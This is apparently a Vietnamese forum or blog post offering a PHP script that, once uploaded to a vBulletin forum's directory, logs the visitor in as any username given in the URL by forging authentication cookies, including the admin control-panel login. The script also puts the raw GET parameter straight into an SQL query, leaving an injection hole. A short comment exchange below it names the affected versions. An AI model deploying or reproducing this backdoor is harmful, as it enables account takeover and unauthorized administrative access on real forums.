Ta có thể login vào forum vbb với 1 nick bất kỳ bằng cách sau :
– Save đoạn code dưới dưới dạng file xxx.php, upload lên hosting.
– Chạy đường dẫn http://domain.com/forum/xxx.php?bd=username
Bùm … truy cập lại link http://domain.com/forum/index.php đã đăng nhập với nick username 
CODE :
|
<?php
if (isset($_GET[‘bd’]))
{
define(‘THIS_SCRIPT’, ‘login’);
require_once(‘./global.php’);
require_once(‘./includes/functions_login.php’);
$vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = ‘" . $_GET[‘bd’] . "’");
if (!$vbulletin->userinfo[‘userid’]) die("Invalid username!");
else
{
vbsetcookie(‘userid’, $vbulletin->userinfo[‘userid’], true, true, true);
vbsetcookie(‘password’, md5($vbulletin->userinfo[‘password’] . COOKIE_SALT), true, true, true);
exec_unstrike_user($_GET[‘bd’]);
process_new_login(‘cplogin’, TRUE, TRUE);
do_login_redirect();
}
}
?> |
DEMO :
Không đc, có nói phiên bản nào không
@Đại Dương : Lỗi này thực hiện được với các forum vBulletin từ version 3.7.4 về trước, bản VBB 3.81 đã khắc phục.